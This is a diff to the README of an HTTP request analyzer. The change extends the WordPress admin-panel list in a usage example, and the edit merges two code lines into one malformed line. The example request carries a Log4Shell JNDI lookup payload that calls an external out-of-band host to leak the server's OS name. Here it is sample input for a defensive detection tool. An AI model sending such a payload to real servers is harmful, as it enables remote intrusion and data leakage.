MartinMerkli/httpanalyzer/README.md

      'User-Agent': 'curl/7.82.0'},
     '159.223.205.51',
     '/api/geojson?url=${jndi:ldap://${sys:os.name}.cd387hid68000106u4rtc.oast.me}',
-    ['wp-content', 'wp-config', 'wp-includes']
-)
-print(f"Malicious rating: {instance.malicious() * 100}%")
+    ['wp-content', 'wp-config', 'wp-includes', 'wp-admin', 'admin'] ) print(f"Malicious rating: {instance.malicious() * 100}%")
 ```

 ### Admin Panels

 To reduce the amount of false positives, specify all admin panels you are using.
-For WordPress this would be `['wp-content', 'wp-config', 'wp-includes']`.
+For WordPress this would be `['wp-content', 'wp-config', 'wp-includes', 'wp-admin', 'admin']`.

 ### Flask